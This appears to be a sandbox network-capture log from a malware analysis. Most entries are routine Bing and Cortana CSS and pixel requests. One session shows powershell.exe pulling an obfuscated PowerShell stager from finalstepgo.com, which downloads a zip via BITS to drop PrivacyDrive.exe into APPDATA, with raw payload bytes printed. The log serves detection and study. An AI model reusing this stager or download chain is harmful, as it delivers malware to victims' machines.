2024-09-26 15:55:40 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 23 72 6f 6f 74 3a 6e 6f 74 28 2e 77 69 6e 31 31 29 3a 6e 6f 74 28 2e 66 69 6c 65 45 78 70 6c 6f 72 65 72 29 3a 6e 6f 74 28 2e 7a 65 72 6f 49 6e 70 75 74 31 39 48 31 29 20 2e 67 72 6f 75 70 43 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 61 62 6c 65 2e 73 75 67 67 65 73 74 69 6f 6e 2e 61 72 72 6f 77 4f 72 54 61 62 41 63 74 69 6f 6e 2e 73 61 5f 68 76 3a 6e 6f 74 28 2e 66 6f 63 75 73 61 62 6c 65 29 3a 68 6f 76 65 72 2c 23 72 6f 6f 74 3a 6e 6f 74 28 2e 77 69 6e 31 31 29 3a 6e 6f 74 28 2e 66 69 6c 65 45 78 70 6c 6f 72 65 72 29 3a 6e 6f 74 28 2e 7a 65 72 6f 49 6e 70 75 74 31 39 48 31 29 20 2e 67 72 6f 75 70 43 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 61 62 6c 65 2e 67 72 6f 75 70 48 65 61 64 65 72 2e 73 61 5f 68 76 3a 6e Data Ascii: 00004000#root:not(.win11):not(.fileExplorer):not(.zeroInput19H1) .groupContainer .selectable.suggestion.arrowOrTabAction.sa_hv:not(.focusable):hover,#root:not(.win11):not(.fileExplorer):not(.zeroInput19H1) .groupContainer .selectable.groupHeader.sa_hv:n
2024-09-26 15:55:40 UTC	12	IN	Data Raw: 62 6f 64 79 5b 64 69 72 5d 20 0d 0a Data Ascii: body[dir]

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.16	49820	23.1.33.206	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:40 UTC	774	OUT	GET /rb/6j/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AbwK&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
2024-09-26 15:55:40 UTC	1206	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Tue, 16 Aug 2022 20:24:42 GMT X-EventID: 66f51028c5f14d4fb501cae1026b5571 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: BNZEEAP00016A47 X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=402333 Expires: Tue, 01 Oct 2024 07:41:13 GMT Date: Thu, 26 Sep 2024 15:55:40 GMT Content-Length: 6 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.8b200117.1727366140.d659660 Timing-Allow-Origin: *
2024-09-26 15:55:40 UTC	6	IN	Data Raw: 7a 7b 61 3a 31 7d Data Ascii: z{a:1}

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.16	49819	150.171.85.254	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:40 UTC	481	OUT	GET /apc/trans.gif?e3bfee56476065f0ab149b748f731e37 HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5 Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: p-ring.msedge.net Connection: Keep-Alive
2024-09-26 15:55:41 UTC	314	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:55:41 GMT Content-Type: image/gif Content-Length: 43 Last-Modified: Wed, 18 Sep 2024 06:16:00 GMT Connection: close ETag: "66ea7020-2b" x-azure-ref: 20240926T155541Z-177786fdc96wlkpdfry7ntnfec0000000d1000000000bw7z X-Cache: CONFIG_NOCACHE Accept-Ranges: bytes
2024-09-26 15:55:41 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.16	49821	23.1.33.206	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:41 UTC	796	OUT	GET /rb/6j/ortl,cc,nc/_BjeFNPDJ-N9umMValublyrbq4Y.css?bu=CZoMvAqfDLwKowy8CrwKvAq8Cg&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
2024-09-26 15:55:41 UTC	1248	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Wed, 26 Jun 2024 15:03:26 GMT X-EventID: 66f510287cf84b4981256d4f4da0690a UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: BNZEEAP00016A82 X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=402230 Expires: Tue, 01 Oct 2024 07:39:31 GMT Date: Thu, 26 Sep 2024 15:55:41 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.90200117.1727366141.5dcbbeb7 Timing-Allow-Origin: *
2024-09-26 15:55:41 UTC	15136	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 23 74 6f 70 52 65 73 75 6c 74 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 2e 6d 73 62 2d 70 65 6f 70 6c 65 20 2e 69 63 6f 6e 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 74 6f 70 52 65 73 75 6c 74 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 2e 6d 73 62 2d 70 65 6f 70 6c 65 20 2e 69 63 6f 6e 3e 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 7d 23 67 72 6f 75 70 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 2e 6d 73 62 2d 70 65 6f 70 6c 65 20 2e 69 63 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 23 67 72 6f 75 70 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 2e 6d 73 62 2d 70 65 6f 70 6c 65 20 2e 69 63 6f 6e 3e 69 6d 67 7b Data Ascii: 00006000#topResults .suggestion.msb-people .icon{vertical-align:middle}#topResults .suggestion.msb-people .icon>img{border-radius:50%;height:100%;width:100%}#groups .suggestion.msb-people .icon{border-radius:50%}#groups .suggestion.msb-people .icon>img{
2024-09-26 15:55:41 UTC	9452	IN	Data Raw: 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 38 29 7d 2e 64 61 72 6b 54 68 65 6d 65 20 2e 70 72 65 76 69 65 77 43 6f 6e 74 61 69 6e 65 72 2e 6d 73 62 50 72 65 76 69 65 77 43 6f 6e 74 61 69 6e 65 72 20 23 62 5f 62 66 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 36 36 36 7d 2e 64 61 72 6b 54 68 65 6d 65 20 2e 70 72 65 76 69 65 77 43 6f 6e 74 61 69 6e 65 72 2e 6d 73 62 50 72 65 76 69 65 77 43 6f 6e 74 61 69 6e 65 72 20 23 62 5f 62 66 62 20 23 62 66 62 5f 63 6f 6e 74 65 6e 74 20 2e 6d 73 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 68 31 7b 63 6f 6c 6f 72 3a 23 66 61 66 39 66 38 7d 2e 64 61 72 6b 54 68 65 6d 65 20 2e 70 72 65 76 69 65 77 43 6f 6e 74 61 69 6e 65 72 2e 6d 73 62 50 72 65 76 69 65 77 43 Data Ascii: (255,255,255,.8)}.darkTheme .previewContainer.msbPreviewContainer #b_bfb{background-color:transparent;color:#666}.darkTheme .previewContainer.msbPreviewContainer #b_bfb #bfb_content .ms-search-text-h1{color:#faf9f8}.darkTheme .previewContainer.msbPreviewC
2024-09-26 15:55:41 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 74 65 6e 74 43 6f 6e 74 61 69 6e 65 72 22 5d 20 5b 63 6c 61 73 73 2a 3d 22 6f 72 67 43 68 61 72 74 22 5d 20 5b 63 6c 61 73 73 2a 3d 22 65 78 70 61 6e 73 69 6f 6e 42 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 22 5d 3e 2e 6d 73 2d 73 65 61 72 63 68 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 61 63 63 65 6e 74 31 32 29 7d 2e 64 61 72 6b 54 68 65 6d 65 20 23 6d 73 62 50 61 6e 65 2e 70 72 65 76 69 65 77 43 6f 6e 74 61 69 6e 65 72 2e 6d 73 62 50 72 65 76 69 65 77 43 6f 6e 74 61 69 6e 65 72 20 23 62 5f 62 66 62 20 2e 6d 73 2d 73 65 61 72 63 68 2d 72 69 62 62 6f 6e 20 23 62 66 62 5f 63 6f 6e 74 65 6e 74 20 5b 63 6c Data Ascii: 00006000tentContainer"] [class="orgChart"] [class="expansionButtonContainer"]>.ms-search-text{background:rgba(0,0,0,.3);border:1px solid var(--accent12)}.darkTheme #msbPane.previewContainer.msbPreviewContainer #b_bfb .ms-search-ribbon #bfb_content [cl
2024-09-26 15:55:41 UTC	8204	IN	Data Raw: 6f 75 74 4d 73 62 44 73 62 43 6f 6e 74 61 69 6e 65 72 53 63 72 6f 6c 6c 53 6d 61 6c 6c 20 2e 66 72 65 45 78 61 6d 70 6c 65 43 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 6d 73 62 46 72 65 43 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 33 34 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 5b 64 69 72 3d 27 6c 74 72 27 5d 20 2e 6d 73 62 46 72 65 43 6f 6e 74 61 69 6e 65 72 7b 70 61 64 64 69 6e 67 3a 36 30 70 78 20 30 20 30 20 32 34 70 78 7d 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 2e 6d 73 62 46 72 65 43 6f 6e 74 61 69 6e 65 72 7b 70 61 64 64 69 6e 67 3a 36 30 70 78 20 32 34 70 78 20 30 20 30 7d 2e 6d 73 62 46 72 65 43 6f 6e 74 61 69 6e 65 72 20 2e 66 72 65 50 72 6f 66 69 6c 65 53 65 63 74 Data Ascii: outMsbDsbContainerScrollSmall .freExampleContainer{margin-top:100px}.msbFreContainer{max-width:340px;height:100%}body[dir='ltr'] .msbFreContainer{padding:60px 0 0 24px}body[dir='rtl'] .msbFreContainer{padding:60px 24px 0 0}.msbFreContainer .freProfileSect
2024-09-26 15:55:41 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 73 61 62 6c 65 2e 77 68 6f 6c 65 70 61 67 65 74 61 62 73 5f 5f 63 6f 6e 74 61 69 6e 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 36 70 78 20 36 70 78 20 30 20 30 7d 2e 64 73 62 2d 68 65 72 6f 20 2e 64 73 62 2d 68 65 72 6f 5f 5f 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 64 65 73 63 72 69 70 74 69 76 65 2d 68 6f 76 65 72 2d 63 61 72 64 5f 5f 62 69 6e 67 2d 6c 6f 67 6f 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 65 6e 64 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 62 6f 64 79 5b 64 69 72 5d 20 2e 64 73 62 2d 68 65 72 6f 20 2e 64 73 62 2d 68 65 72 6f 5f 5f 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 64 65 73 63 72 69 70 74 69 76 65 2d 68 6f 76 65 72 2d 63 61 72 64 5f 5f 62 69 Data Ascii: 00004000sable.wholepagetabs__container{border-radius:6px 6px 0 0}.dsb-hero .dsb-hero__content-container .descriptive-hover-card__bing-logo{align-self:flex-end;position:absolute}body[dir] .dsb-hero .dsb-hero__content-container .descriptive-hover-card__bi
2024-09-26 15:55:41 UTC	12	IN	Data Raw: 69 72 74 68 64 61 79 2d 63 61 0d 0a Data Ascii: irthday-ca
2024-09-26 15:55:41 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 72 64 2d 68 65 72 6f 2d 63 6c 61 69 6d 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 2e 38 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 73 62 2d 68 65 72 6f 2e 64 73 62 2d 62 69 72 74 68 64 61 79 2d 63 61 72 64 2d 68 65 72 6f 20 2e 62 69 72 74 68 64 61 79 2d 63 61 72 64 2d 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 3b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 33 70 78 29 3b 61 6e 69 6d 61 74 69 6f 6e 3a 62 69 72 74 68 64 61 79 2d 72 65 76 65 61 6c 20 6c 69 6e 65 61 72 Data Ascii: 00004000rd-hero-claim-button:hover{opacity:.8 !important}.dsb-hero.dsb-birthday-card-hero .birthday-card-footer{font-size:11px;color:#000;height:30px;display:flex;align-items:flex-end;opacity:0;transform:translateY(-3px);animation:birthday-reveal linear
2024-09-26 15:55:41 UTC	12	IN	Data Raw: 6d 73 62 64 73 62 5f 70 65 6f 0d 0a Data Ascii: msbdsb_peo
2024-09-26 15:55:41 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 70 6c 65 5f 65 78 70 6c 61 6e 61 74 69 6f 6e 73 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 23 6d 73 62 5f 64 73 62 5f 72 6f 6f 74 20 2e 6d 73 62 64 73 62 2d 6d 70 2d 63 6f 6e 74 65 6e 74 20 2e 6d 73 62 64 73 62 2d 6d 70 2d 70 70 6c 2e 6d 73 62 64 73 62 5f 70 65 6f 70 6c 65 5f 65 78 70 6c 61 6e 61 74 69 6f 6e 73 2c 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 23 6d 73 62 5f 64 73 62 5f 62 72 74 6f 70 20 2e 6d 73 62 64 73 62 2d 6d 70 2d 63 6f 6e 74 65 6e 74 20 2e 6d 73 62 64 73 62 2d 6d 70 2d 70 70 6c 2e 6d 73 62 64 73 62 5f 70 65 6f 70 6c 65 5f 65 78 70 6c 61 6e 61 74 69 6f 6e 73 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a Data Ascii: 00006000ple_explanations{padding-left:0;padding-right:0}body[dir='rtl'] #msb_dsb_root .msbdsb-mp-content .msbdsb-mp-ppl.msbdsb_people_explanations,body[dir='rtl'] #msb_dsb_brtop .msbdsb-mp-content .msbdsb-mp-ppl.msbdsb_people_explanations{padding-right:
2024-09-26 15:55:41 UTC	8204	IN	Data Raw: 6d 73 62 5f 64 73 62 5f 62 72 74 6f 70 20 2e 6d 73 62 64 73 62 2d 6d 70 2d 63 6f 6e 74 65 6e 74 20 2e 6d 73 62 5f 64 73 62 5f 73 63 6f 70 65 5f 65 6e 74 72 79 5f 62 75 74 74 6f 6e 5f 64 6f 63 75 6d 65 6e 74 73 20 2e 6d 73 62 5f 64 73 62 5f 73 63 6f 70 65 5f 65 6e 74 72 79 5f 62 75 74 74 6f 6e 5f 74 65 78 74 7b 6c 65 66 74 3a 36 30 70 78 7d 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 23 6d 73 62 5f 64 73 62 5f 72 6f 6f 74 20 2e 6d 73 62 64 73 62 2d 6d 70 2d 63 6f 6e 74 65 6e 74 20 2e 6d 73 62 5f 64 73 62 5f 73 63 6f 70 65 5f 65 6e 74 72 79 5f 62 75 74 74 6f 6e 5f 64 6f 63 75 6d 65 6e 74 73 20 2e 6d 73 62 5f 64 73 62 5f 73 63 6f 70 65 5f 65 6e 74 72 79 5f 62 75 74 74 6f 6e 5f 74 65 78 74 2c 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 23 6d 73 62 5f Data Ascii: msb_dsb_brtop .msbdsb-mp-content .msb_dsb_scope_entry_button_documents .msb_dsb_scope_entry_button_text{left:60px}body[dir='rtl'] #msb_dsb_root .msbdsb-mp-content .msb_dsb_scope_entry_button_documents .msb_dsb_scope_entry_button_text,body[dir='rtl'] #msb_

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.16	49822	150.171.85.254	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:41 UTC	481	OUT	GET /apc/trans.gif?abf6b0b4363a8fb8ec7d6cce4a4b9cc3 HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5 Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: p-ring.msedge.net Connection: Keep-Alive
2024-09-26 15:55:42 UTC	314	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:55:41 GMT Content-Type: image/gif Content-Length: 43 Last-Modified: Fri, 20 Sep 2024 10:22:37 GMT Connection: close ETag: "66ed4ced-2b" x-azure-ref: 20240926T155541Z-15c756dfbb8nnc2mwgmq02swv400000009sg000000007w60 X-Cache: CONFIG_NOCACHE Accept-Ranges: bytes
2024-09-26 15:55:42 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.16	49823	185.255.122.133	443	8056	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:42 UTC	175	OUT	GET /uploads/il2.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: finalstepgo.com Connection: Keep-Alive
2024-09-26 15:55:42 UTC	206	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:55:35 GMT Server: Apache Last-Modified: Thu, 26 Sep 2024 14:09:48 GMT Accept-Ranges: bytes Content-Length: 563 Connection: close Content-Type: text/plain
2024-09-26 15:55:42 UTC	563	IN	Data Raw: 24 44 43 39 6f 74 6a 30 56 3d 27 68 74 74 70 73 3a 2f 2f 66 69 6e 61 6c 73 74 65 70 67 6f 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 69 6c 32 32 32 2e 7a 69 70 27 3b 20 24 4f 6f 39 49 47 46 72 58 3d 24 65 6e 76 3a 41 50 50 44 41 54 41 2b 27 5c 4f 49 6c 71 4a 59 75 45 27 3b 20 24 6a 52 41 59 6e 57 4f 53 3d 24 65 6e 76 3a 41 50 50 44 41 54 41 2b 27 5c 79 41 4e 72 64 4e 4b 54 2e 7a 69 70 27 3b 20 24 42 74 64 53 47 66 63 69 3d 24 4f 6f 39 49 47 46 72 58 2b 27 5c 50 72 69 76 61 63 79 44 72 69 76 65 2e 65 78 65 27 3b 20 69 66 20 28 2d 6e 6f 74 20 28 74 65 53 54 2d 50 61 74 48 20 24 4f 6f 39 49 47 46 72 58 29 29 20 7b 20 6e 65 77 2d 69 74 45 4d 20 2d 50 61 74 68 20 24 4f 6f 39 49 47 46 72 58 20 2d 49 74 65 6d 54 79 70 65 20 44 69 72 65 63 74 6f 72 79 20 7d 3b 20 53 Data Ascii: $DC9otj0V='https://finalstepgo.com/uploads/il222.zip'; $Oo9IGFrX=$env:APPDATA+'\OIlqJYuE'; $jRAYnWOS=$env:APPDATA+'\yANrdNKT.zip'; $BtdSGfci=$Oo9IGFrX+'\PrivacyDrive.exe'; if (-not (teST-PatH $Oo9IGFrX)) { new-itEM -Path $Oo9IGFrX -ItemType Directory }; S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.16	49827	185.255.122.133	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:44 UTC	155	OUT	HEAD /uploads/il222.zip HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: finalstepgo.com
2024-09-26 15:55:44 UTC	215	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:55:37 GMT Server: Apache Last-Modified: Thu, 26 Sep 2024 14:09:59 GMT Accept-Ranges: bytes Content-Length: 1527814 Connection: close Content-Type: application/zip

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.16	49828	185.255.122.133	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:45 UTC	206	OUT	GET /uploads/il222.zip HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMT User-Agent: Microsoft BITS/7.8 Host: finalstepgo.com
2024-09-26 15:55:45 UTC	215	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:55:38 GMT Server: Apache Last-Modified: Thu, 26 Sep 2024 14:09:59 GMT Accept-Ranges: bytes Content-Length: 1527814 Connection: close Content-Type: application/zip
2024-09-26 15:55:45 UTC	7977	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 63 35 3a 59 4e 2b 47 29 60 4f 17 00 88 f8 2b 00 10 00 00 00 50 72 69 76 61 63 79 44 72 69 76 65 2e 65 78 65 ec 7d 7f 5c 54 45 f7 f0 dd 65 81 05 57 76 51 50 4a 54 d4 b5 2c d4 30 b4 34 34 41 5d 44 03 dd 15 59 f0 17 98 19 6e ab 25 e1 ae 62 8a 4a cb a2 b7 f1 a2 8f 69 a9 99 61 da 53 8f 59 69 9a a2 a9 a1 18 8b 4a 0a 66 66 69 6a 3e 56 97 c0 c2 34 45 43 ef 3b 67 e6 de fd 01 8b d0 f3 fd 3e ef e7 fd e3 b5 4f dc b9 73 cf cc 9c 39 73 ce 99 33 67 ce cc 26 4d 5c c9 f8 30 0c a3 c0 ff 0b 02 c3 14 33 f4 5f 2c d3 f2 bf 08 19 c3 04 75 dd 17 c4 ec 0a f8 aa 5b b1 2c f1 ab 6e e3 4d 2f cc 89 c8 ca 9e 3d 23 fb d9 17 23 9e 7b f6 a5 97 66 5b 22 a6 3d 1f 91 6d 7d 29 e2 85 97 22 46 8c 4d 8e 78 71 f6 f4 e7 fb b6 6d 1b a8 15 eb 98 b1 d1 3e a1 87 50 13 28 Data Ascii: PKc5:YN+G)`O+PrivacyDrive.exe}\TEeWvQPJT,044A]DYn%bJiaSYiJffij>V4EC;g>Os9s3g&M\03_,u[,nM/=##{f["=m})"FMxqm>P(
2024-09-26 15:55:46 UTC	8000	IN	Data Raw: 1f af f0 89 e7 de 60 85 fb 7c 72 cb 35 64 86 e2 5d 10 73 d5 6f ae 14 73 75 84 cd d7 6e c7 59 ee 53 4b be b6 1c e7 48 b3 0b 46 21 5f bb 8b ca 24 83 93 c5 9e 49 7f 9a 94 00 32 71 7d 70 46 02 3f 2a 23 c8 63 03 7d 2b a2 70 45 62 11 f1 03 80 83 fd 5a 46 c1 65 68 05 68 37 88 d4 ce 3b 44 26 d9 f9 64 92 0d 80 b0 40 8e 82 ea b9 d5 da 0f 40 32 06 6f a7 81 5a fb 69 e3 d6 8e 18 60 3f 58 12 34 0e 8b 9b 46 43 b5 fa a1 a5 2a bf 66 e6 6d e8 6b 89 ab 48 bb 7d 52 e8 d6 08 6d 18 f8 7b d8 2b 98 ac fe 70 14 f1 24 96 97 90 34 a2 96 06 e3 16 a1 22 f0 de 84 89 6d e2 64 94 88 9f 7a 38 7d c2 84 8d eb 09 d1 83 a4 91 98 2d 2c 68 24 62 0b cf b6 7a fa 1e 25 a3 92 38 58 9c b0 63 c5 e7 f8 85 f4 7b a2 67 94 96 85 0a 4f be 36 df 35 06 cb 3c 93 40 5b 37 00 90 6e 8b 48 5c 39 ae 30 0b 16 23 Data Ascii: `\|r5d]sosunYSKHF!_$I2q}pF?#c}+pEbZFehh7;D&d@@2oZi`?X4FCfmkH}Rm{+p$4"mdz8}-,h$bz%8Xc{gO65<@[7nH\90#
